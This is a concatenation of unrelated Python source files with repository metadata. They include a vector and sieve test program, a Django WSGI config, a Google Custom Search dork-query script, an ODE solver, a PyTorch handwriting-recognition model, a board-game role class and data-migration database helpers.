return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector5", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector5", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length5(self:"Vector5") -> int:
return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
doubling_limit:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector2(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector3(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector4(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector5(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
doubling_limit5:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector5") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity5(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Makes a vector in the range [i, j)
def vrange(i:int, j:int) -> Vector:
v:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
v:Vector = None
v2:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
# Sieve of Eratosthenes (not really)
def sieve(v:Vector) -> object:
i:int = 0
j:int = 0
k:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve2(v:Vector, v2:Vector) -> object:
i:int = 0
i2:int = 0
j:int = 0
j2:int = 0
k:int = 0
k2:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
j:int = 0
j2:int = 0
j3:int = 0
k:int = 0
k2:int = 0
k3:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
j5:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
k5:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
# Input parameter
n:int = 50
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print
while i < v.length():
print(v.get(i))
i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
6e98f496de001b623f1d7d4423e52d8f9cfe8f9a
|
ed30efbe1d307f9a4428f5343d43334e9cfebc9f
|
/payment_system/wsgi/__init__.py
|
d92895c9f675d1a7f83ae96ecf833c1253fd84bf
|
[] |
no_license
|
Frumlen/payment_system
|
409a95a44284ad8c805bd00f68bff3830cf2d535
|
dd3504aa02ec4268f2c1419ea5e4febcb9427adb
|
refs/heads/master
| 2020-05-19T10:05:53.416289
| 2019-05-15T14:27:00
| 2019-05-15T14:27:00
| 184,964,347
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,259
|
py
|
"""WSGI config for payment_system project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from django.core.wsgi import get_wsgi_application
from payment_system.wsgi.health_check import health_check
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'payment_system.settings')
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
application = health_check(application, '/health/')
|
[
"m.medzhidov@paymo.ru"
] |
m.medzhidov@paymo.ru
|
7c51fe984072915a490d61a51cb82390d3d7985c
|
4a7c8970f6f2fa9449bc4476f0ff105630ec79e2
|
/les03/practise exercise3_3.py
|
9bae97b2a4624cb6b55ed8790ad2ce0e76ef2b3d
|
[] |
no_license
|
hiddeagema/programming
|
b3e5f676301bb46073d7ca14d06ae8799cbff47f
|
f893518ccd8f15a69078902844cd67563ab42cd7
|
refs/heads/master
| 2021-05-16T12:21:41.649797
| 2017-11-10T16:10:14
| 2017-11-10T16:10:14
| 105,266,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
py
|
leeftijd = int(input('Wat is je leeftijd: '))
paspoort = input('ben je in het bezit van een nederlans paspoort?: ')
if leeftijd >= 18 and paspoort == 'ja':
print('gefeliciteerd, je mag stemmen!')
else:
print('helaas, je mag nog niet stemmen!')
|
[
"hiddeagema@hotmail.com"
] |
hiddeagema@hotmail.com
|
ce31008417794c43ba2ba1e3cb618506de4eb633
|
69039ed1289d09420f425e21f4d370ccb531bb7b
|
/script.py
|
46cba30ab41cbbe07072da03a0fe971d35990f30
|
[] |
no_license
|
ev1lm0rty/Dorky
|
38274a0df19d8ad62887bd164cd01c46aeeec46a
|
5846d4485cda6e988ba0b5367118c3106bb60f0c
|
refs/heads/master
| 2023-03-31T06:43:41.099409
| 2021-04-08T14:18:31
| 2021-04-08T14:18:31
| 338,312,959
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,555
|
py
|
#!/usr/bin/python3
import argparse
import time
import sys
from apiclient.discovery import build
def banner():
print("-"*50)
print("DORKY by ev1l._.m0rty")
print("https://github.com/mrjoker05")
print("-"*50)
print()
def query(query , api , cse , f):
try:
s = build("customsearch" , "v1" , developerKey = api).cse()
#results = s.list(q = query , cx = cse, start=21).execute()
results = s.list(q = query , cx = cse).execute()
return results['items']
except:
print("\n[!] Daily Limit of API key reached. Try tomorrow\n")
f.close()
sys.exit()
def main():
banner()
parser = argparse.ArgumentParser()
parser.add_argument("-d" ,"--dork" , help="List of dorks" , required = True)
parser.add_argument("-a" , "--api" , help="Google API key", required = True)
parser.add_argument("-c" , "--csi" , help="Custom Search Id", required = True)
parser.add_argument("-o" , "--output" , help="Output file")
args = parser.parse_args()
api = args.api
csi = args.csi
dorks = args.dork
output = args.output
f = open(dorks)
try:
w = open(output , "w+")
except:
pass
lines = f.readlines()
results = []
for i in lines:
for j in query(i.strip() , api , csi ,f):
print(j['link'])
try:
w.write(j['link'])
w.write('\n')
except:
pass
try:
w.close()
except:
pass
f.close()
main()
|
[
"morty@localhost"
] |
morty@localhost
|
ce491302ad4795ecae1138b676b7361bc5a55e19
|
b54ca0d79c2a3ea601b4d13b055845835dbda696
|
/src/module6.py
|
d69113ba57778ff7b4e467941e3fb43b45867167
|
[] |
no_license
|
lucasp0927/python_numerical_project
|
7355ddcc64d123103b6d3fa14d5ca4d8d4053057
|
923f4229b8182f53b60df1436ea65bf1298cefdd
|
refs/heads/master
| 2020-05-17T18:12:19.035506
| 2011-06-26T17:44:50
| 2011-06-26T17:44:50
| 1,919,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
'''Module 6: exact solution
'''
import numpy as np
import scipy as sp
import scipy.integrate as inte
def exactSol(Amp, w, x0,v0,t0,x_int):
with open('param.in') as fin:
for line in fin:
data=line.split()
a0=float(data[0])
a1=float(data[1])
a2=float(data[2])
a3=float(data[3])
b=float(data[4])
xinit=[x0,v0]
print 'a0={0:6.4f} a1={1:6.4f} a2={2:6.4f} a3={3:6.4f}'.format(a0,a1,a2,a3)
dt=1e-5
t=np.arange(0,t0+dt,dt)
y=inte.odeint(f,xinit,t,args=(a0,a1,a2,a3,b,Amp,w))
with open('exact.dat','w') as fout:
for i in range(len(y)):
fout.write('%10.6f %10.6f\n' % (t[i],y[i,0]))
error=abs(float(y[-1,0])-x_int)/x_int
#print 'error: {0:8.2%}'.format( error)
return t,y[:,0],error
def f(x,t,a0,a1,a2,a3,b,Amp,w):
x0=x[0]
x1=x[1]
return [float(x1),(a0+a1*x0+a2*x0**2+a3*x0**3)-b*x1+Amp*np.cos(w*t)]
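# Usage sketch (illustrative, not part of the original module): exactSol integrates
# x'' = a0 + a1*x + a2*x^2 + a3*x^3 - b*x' + Amp*cos(w*t) with odeint, reading the
# coefficients from a 'param.in' file ("a0 a1 a2 a3 b" on one line, which must
# exist in the working directory) and writing 'exact.dat'. The numbers below are
# arbitrary assumptions.
if __name__ == '__main__':
    t, x, err = exactSol(Amp=1.0, w=2.0, x0=0.1, v0=0.0, t0=1.0, x_int=0.1)
    print 'final x = {0:10.6f}, relative error vs x_int = {1:8.2%}'.format(x[-1], err)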
|
[
"lucasp0927@gmail.com"
] |
lucasp0927@gmail.com
|
0ac07e17df6cc7bc9ae4c5d0f646c6f125e05474
|
7fce2bdb66b00f2cf7f5df5082de27941fae4e26
|
/src/model.py
|
e621a311f44b6a498e10ff2d25313cfaf59ed391
|
[] |
no_license
|
hqdang/HTR-using-Pytorch
|
e3352de678cbc17b13d3bda349e9532f9cd23cea
|
4478efb6c55fd5612f8a241d20a00a9c04471abe
|
refs/heads/master
| 2020-05-20T17:18:45.361569
| 2019-05-21T00:18:16
| 2019-05-21T00:18:16
| 185,685,959
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,483
|
py
|
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
import cv2
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import torchvision
from torchvision import datasets, models, transforms
from DL import DataLoader, Batch
import decode_beam
import tensorflow as tf
from SamplePreprocessor import preprocess
import os
import pathlib
import BestPath
import Common
import time
import copy
import math
class Model(torch.nn.Module):
# model constants
batchSize = 50
imgSize = (128, 32)
maxTextLen = 32
def __init__(self):
super(Model, self).__init__()
self.snapID = 0
#self.is_train = tf.placeholder(tf.bool, name='is_train')
# input image batch
#self.inputImgs = tf.placeholder(tf.float32, shape=(None, Model.imgSize[0], Model.imgSize[1]))
#self.inputImgs = torch.tensor(batch.imgs, Model.imgSize[0], Model.imgSize[1])
#cnn function
self.conv1 = torch.nn.Conv2d(1, 32, 5, stride = 1, padding = 2).cuda()
        self.batchnorm1 = torch.nn.BatchNorm2d(32).cuda()
self.relu1 = torch.nn.ReLU().cuda()
self.pool1 = torch.nn.MaxPool2d((2,2), stride = (2,2)).cuda()
self.conv2 = torch.nn.Conv2d(32, 64, 5, stride = 1, padding = 2).cuda()
self.batchnorm2 = torch.nn.BatchNorm2d(64).cuda()
self.relu2 = torch.nn.ReLU().cuda()
self.pool2 = torch.nn.MaxPool2d((2,2), stride = (2,2)).cuda()
self.conv3 = torch.nn.Conv2d(64, 128, 3, stride = 1, padding = 1).cuda()
self.batchnorm3 = torch.nn.BatchNorm2d(128).cuda()
self.relu3 = torch.nn.ReLU().cuda()
self.pool3 = torch.nn.MaxPool2d((1,2), stride = (1,2)).cuda()
self.conv4 = torch.nn.Conv2d(128, 128, 3, stride = 1, padding = 1).cuda()
self.batchnorm4 = torch.nn.BatchNorm2d(128).cuda()
self.relu4 = torch.nn.ReLU().cuda()
self.pool4 = torch.nn.MaxPool2d((1,2), stride = (1,2)).cuda()
self.conv5 = torch.nn.Conv2d(128, 256, 3, stride = 1, padding = 1).cuda()
self.batchnorm5 = torch.nn.BatchNorm2d(256).cuda()
self.relu5 = torch.nn.ReLU().cuda()
self.pool5 = torch.nn.MaxPool2d((1,2), stride = (1,2)).cuda()
#rnn function
self.lstm = torch.nn.LSTM(256, 256, 2, batch_first = True, bidirectional = True).cuda()
# BxTxH + BxTxH -> BxTx2H -> BxTx1x2H
#squeeze
self.rnnconv2d = torch.nn.Conv2d(512, 80, 1, stride = 1, padding = 0).cuda()
def forward(self, inputImgs):
#cnn forward pass
inputTensor = torch.from_numpy(inputImgs).cuda()
inputTensor = inputTensor.type(torch.FloatTensor).cuda()
inputTensor = torch.unsqueeze(inputTensor, 1)
#print (inputTensor.size()) [50,1,128,32]
out = self.conv1(inputTensor)
out = self.batchnorm1(out)
out = self.relu1(out)
out = self.pool1(out)
out = self.conv2(out)
out = self.batchnorm2(out)
out = self.relu2(out)
out = self.pool2(out)
out = self.conv3(out)
out = self.batchnorm3(out)
out = self.relu3(out)
out = self.pool3(out)
out = self.conv4(out)
out = self.batchnorm4(out)
out = self.relu4(out)
out = self.pool4(out)
out = self.conv5(out)
out = self.batchnorm5(out)
out = self.relu5(out)
out = self.pool5(out)
#rnn forward pass
#print (cnn.size())
out = torch.squeeze(out, 3)
out = out.permute(0,2,1)
#print (cnn.size()) cnn= [50,32,256]
#h0, c0 shape (num_layers * num_directions, batch, hidden_size):
h0 = torch.zeros(4, out.size(0), 256).cuda()
c0 = torch.zeros(4, out.size(0), 256).cuda()
#packed_cnn = torch.nn.utils.rnn.pack_padded_sequence(cnn, [32]*cnn.size(1))
#print(packed_cnn.size())
out, _ = self.lstm(out, (h0,c0))
#print (rnn_out.size())
#rnn_out, _ = torch.nn.utils.rnn.pad_packed_sequence(rnn_out, batch_first=False)
#print (rnn_out.size()) [50,32,512]
out = torch.unsqueeze(out, 3) #[50,512,32,1]
out = out.permute(0,2,1,3) #[50,32,1,512]
#print (rnn_out.size())
#print (rnn_out.size())
out = self.rnnconv2d(out)
#out = self.fnl(rnn_out)
return out
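# Usage sketch (illustrative, not part of the original model file): runs one
# forward pass on a random batch; the shapes follow the class constants and the
# shape comments above, and a CUDA-capable GPU is required because every layer
# is moved to .cuda().
if __name__ == '__main__':
    dummy_batch = np.random.rand(Model.batchSize, Model.imgSize[0], Model.imgSize[1]).astype(np.float32)
    htr_model = Model()
    logits = htr_model(dummy_batch)
    print(logits.size())  # expected: torch.Size([50, 80, 32, 1]) = B x classes x T x 1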
|
[
"noreply@github.com"
] |
hqdang.noreply@github.com
|
54819c2945e27291a240ea27cec05786e14d8569
|
fd67c272b56eb6386e6e7e086c07616acdaa65b0
|
/Medic.py
|
ba276016a14278c0c369fcac7b095d59f79e98b3
|
[
"MIT"
] |
permissive
|
KToshiki-umi/Cuidemic
|
1894d7772012545ddcac2f91372e084d6fa72a4a
|
6f98d3d4c955fc298d1a4e31270a0e0ecc3d6752
|
refs/heads/master
| 2021-01-10T16:44:36.164847
| 2015-10-06T16:32:47
| 2015-10-06T16:32:47
| 43,758,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,149
|
py
|
#! /usr/bin/python
# --*-- coding:utf-8 --*--
"""
Medic.py
Copyright (c) 2015 Toshiki Koizumi
This software is released under the MIT License.
http://opensource.org/licenses/mit-license.php
"""
#v.1.01
from Player import Player
class Medic(Player):
def __init__(self):
Player.__init__(self)
self._role = "Medic" #役職名英名
#役職名
self._name = u" 衛生兵"
def treatDisease(self, game_data):
print u"■感染者の治療"
diseases = u""
disease_flag = []
disease_count = 0
color_index = ""
for temp_color_index in range(4):
if game_data._infection_status[self._location][temp_color_index] > 0:
diseases += u"%d : %s " % (temp_color_index, game_data._disease_name[temp_color_index])
disease_flag.append(temp_color_index)
color_index = temp_color_index
disease_count += 1
while(1):
if disease_count == 1:
                # if only one disease is present here, treat it automatically
break
else:
print u"\n 治療したい病原体を選択してください"
print diseases
color_index = raw_input(" > ")
if color_index.isdigit():
color_index = int(color_index)
if disease_flag.count(color_index) > 0:
break
else:
print u" 入力した値は範囲外です"
elif color_index == "":
game_data._message = u"■ 処理はキャンセルされました"
return 0
else:
print u" 数値を入力してください"
game_data.cureDisease(self._location, 3, int(color_index))
game_data._message = u"■ %02d:%s で%sの治療を行いました" % (self._location, game_data._card_info[self._location], game_data._disease_name[int(color_index)])
return 1
|
[
"cb400f.4four@gmail.com"
] |
cb400f.4four@gmail.com
|
a485ba789e4cb165a9a47651c00c9cbcc5044881
|
786de89be635eb21295070a6a3452f3a7fe6712c
|
/DmMover/trunk/src/db_access.py
|
19e93a9e3957ed724ec3652b8cbbf6c793bb70c5
|
[] |
no_license
|
connectthefuture/psdmrepo
|
85267cfe8d54564f99e17035efe931077c8f7a37
|
f32870a987a7493e7bf0f0a5c1712a5a030ef199
|
refs/heads/master
| 2021-01-13T03:26:35.494026
| 2015-09-03T22:22:11
| 2015-09-03T22:22:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,292
|
py
|
#!/usr/bin/python
# ------------------------------------------------------------------
# Find below utilities needed by the ONLINE-to-Lustre data migration
# service.
# ------------------------------------------------------------------
import sys
import time
import MySQLdb as db
__host = None
__user = None
__passwd = None
__db = None
__db_conn = "/reg/g/psdm/psdatmgr/datamigr/.mvrdb-conn"
__dmtable = "data_migration"
# ------------------------------------------------------------------------
# Connect to MySQL server and execute the specified SELECT statement, which
# is supposed to return a single row (if it returns more, everything after
# the first row is ignored). Return the result as a dictionary, otherwise return None.
#
# NOTE: this method won't catch MySQL exceptions. It's up to
# the caller to do so. See the example below:
#
# try:
# result = __do_select('SELECT...')
# except db.Error, e:
# print 'MySQL connection failed: '.str(e)
# ...
#
# ------------------------------------------------------------------------------
# database connection and table selection
def __connect_db():
""" Connect to database. Use default if no connection param were given"""
if not __db:
select_db(__db_conn)
return db.connect(host=__host, user=__user, passwd=__passwd, db=__db)
def select_db(conn_file):
""" Set database connection parameter"""
global __host, __user, __passwd, __db
line = open(conn_file).readline().rstrip()
key_value = dict([x.split('=', 1) for x in line.split(';') if x])
__host = key_value['Server']
__user = key_value['Uid']
__passwd = key_value.get('Pwd', "")
__db = key_value['Database']
def table_dm():
""" Select the data_migration table for ffb datamovers """
global __dmtable
__dmtable = "data_migration"
def table_dm_ana():
""" Select the data_migration table for ffb datamovers """
global __dmtable
__dmtable = "data_migration_ana"
def table_dm_ffb():
""" Select the data_migration table for ffb datamovers """
global __dmtable
__dmtable = "data_migration_ffb"
# ----------------
# query functions
# ----------------
def __escape_string(str):
conn = __connect_db()
return conn.escape_string(str)
def __do_select(statement):
conn = __connect_db()
cursor = conn.cursor(db.cursors.SSDictCursor)
cursor.execute("SET SESSION SQL_MODE='ANSI'")
cursor.execute(statement)
rows = cursor.fetchall()
if not rows : return None
return rows[0]
def __do_select_many(statement):
conn = __connect_db()
cursor = conn.cursor(db.cursors.SSDictCursor)
cursor.execute("SET SESSION SQL_MODE='ANSI'")
cursor.execute(statement)
return cursor.fetchall()
# ------------------------------------------------------------------------------------------
# Execute any SQL statement which doesn't return a result set
#
# Notes:
# - exceptions are thrown exactly as explained for the previously defined method __do_select
# - the statement will be surrounded by BEGIN and COMMIT transaction statements
# ------------------------------------------------------------------------------------------
def __do_sql(statement):
conn = __connect_db()
cursor = conn.cursor(db.cursors.SSDictCursor)
cursor.execute("SET SESSION SQL_MODE='ANSI'")
cursor.execute("BEGIN")
cursor.execute(statement)
cursor.execute("COMMIT")
# ------------------------------------------------------------
# Return the current time expressed in nanoseconds. The result
# will be packed into a 64-bit number.
# ------------------------------------------------------------
def __now_64():
t = time.time()
sec = int(t)
nsec = int(( t - sec ) * 1e9 )
return sec*1000000000L + nsec
# ---------------------------------------------------------------------
# Look for an experiment with specified identifier and obtain its name.
# Return None if no such experiment exists in the database.
# ------------------------------------------------------------------------------
def id2name(id):
row = __do_select("SELECT name FROM experiment WHERE id=%s" % id)
if not row : return None
return row['name']
# ---------------------------------------------------------------------
# Look for an experiment with specified identifier.
# Return None if no such experiment exists in the database.
# ------------------------------------------------------------------------------
def getexp(id):
row = __do_select("SELECT * FROM experiment WHERE id=%s" % id)
return row
# -----------------------------------------------------------------------------
# Look for an experiment with specified name and obtain its numeric identifier.
# Return None if no such experiment exists in the database.
# ------------------------------------------------------------------------------
def name2id(name):
row = __do_select("SELECT id FROM experiment WHERE name='%s'" % name)
if not row : return None
return int(row['id'])
def instr4id(id):
row = __do_select("SELECT i.name FROM instrument `i`, experiment `e` "
"WHERE e.id=%d AND e.instr_id=i.id" % id)
if row:
return row['name']
else:
return None
# --------------------------------------------------------------------
# Get data path for an experiment. Use a numeric identifier to specify
# the experiment.
# Return None if no data path is configured for the experiment.
# --------------------------------------------------------------------
def getexp_datapath(id):
row = __do_select("SELECT val FROM experiment_param WHERE exper_id=%s AND param='DATA_PATH'" % id)
if not row : return None
return row['val']
def getexp_datapath_all():
""" return name, id and exper-path for all experiments """
rows = __do_select_many("select e.name, e.id, p.val from experiment `e`, experiment_param `p`"
"where p.exper_id=e.id and p.param='DATA_PATH'")
return rows
# -------------------------------------
# Report the file migration start event
# -------------------------------------
def file_migration_start(exper_id, fn):
now = __now_64()
__do_sql("UPDATE %s SET start_time=%d, stop_time=NULL, error_msg=NULL "
"WHERE exper_id=%d AND file='%s'" % (__dmtable, now, exper_id, fn))
# --------------------------------------------------
# Report the file migration stop event and error_msg
# if error_msg='' mark file as FAIL
# --------------------------------------------------
def file_migration_stop(exper_id, fn, error_msg=None, mark_failed=False):
now = __now_64()
if error_msg is None:
error_msg_sql = ", error_msg=NULL, status='DONE'"
elif mark_failed:
error_msg_sql = ", error_msg=NULL, status='FAIL'"
else:
error_msg_sql = ", error_msg='%s'" % __escape_string(error_msg)
__do_sql("UPDATE %s SET stop_time=%d %s WHERE exper_id=%d AND file='%s'" %
(__dmtable, now, error_msg_sql, exper_id, fn))
return
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def files2migrate(instr=None,host=None,filetype=None):
""" Report files which are yet to be migrated from the specified (if any provided)
host belonging to the specified instrument (if any provided).
Select files from instrument(s), host the file originates or filetype.
<instr> is either a instrument name or a list of instr names.
"""
exper_id_select_sql = ""
if instr:
if isinstance(instr,str):
instr_q = "i.name='%s'" % instr
elif isinstance(instr,list):
if len(instr) == 1:
instr_q = "i.name='%s'" % instr[0]
else:
instr_q = "i.name IN (%s)" % ",".join(["'%s'" % x for x in instr])
else:
instr_q=None
if instr_q:
exper_id_select_sql = "AND exper_id in (SELECT e.id FROM experiment `e`, " \
"instrument `i` WHERE %s AND e.instr_id=i.id)" % instr_q
host_sql = ""
if host is not None:
host_sql = "AND host='%s'" % host
ftype_sql = ""
if filetype:
ftype_sql = "AND file_type='%s'" % filetype
else:
ftype_sql = "AND file_type != '%s'" % "smd.xtc"
select_condition = "status = 'WAIT'"
files = __do_select_many("SELECT dm.exper_id,dm.file,dm.file_type,dm.host,dm.dirpath FROM %s `dm` "
"WHERE %s %s %s %s" %
(__dmtable, select_condition, exper_id_select_sql, host_sql, ftype_sql))
for f in files:
f['instrument'] = __do_select("SELECT i.name FROM instrument `i`, experiment `e` "
"WHERE e.id=%d AND e.instr_id=i.id" % f['exper_id'])
return files
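# Example (illustrative, not from the original code): select pending 'xtc' files
# for a couple of instruments from the default data_migration table:
#
#   table_dm()
#   pending = files2migrate(instr=['XPP', 'CXI'], filetype='xtc')
#   for f in pending:
#       print f['exper_id'], f['host'], f['dirpath'], f['file']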
# -------------------------------------
# Find index files that failed transfer
# -------------------------------------
def failed_idx_files(age=0):
select = ""
if age > 0:
select = "AND start_time > %d" % age
query = "SELECT exper_id,file,start_time FROM data_migration " \
"WHERE file_type = 'xtc.idx' and status = 'FAIL' %s " % select
files = __do_select_many(query)
return files
# ------------------------------------
# Get info for all experiments
# ------------------------------------
def expr_info():
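    """ Return a pair (experiments, instruments): experiments maps each
        experiment name to its row with keys 'name', 'posix_gid' and
        'instr_id'; instruments maps each instrument id to its name.
    """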
data = {}
exprinfo = __do_select_many("SELECT name,posix_gid,instr_id from experiment")
for info in exprinfo:
data[info['name']] = info
instr = {}
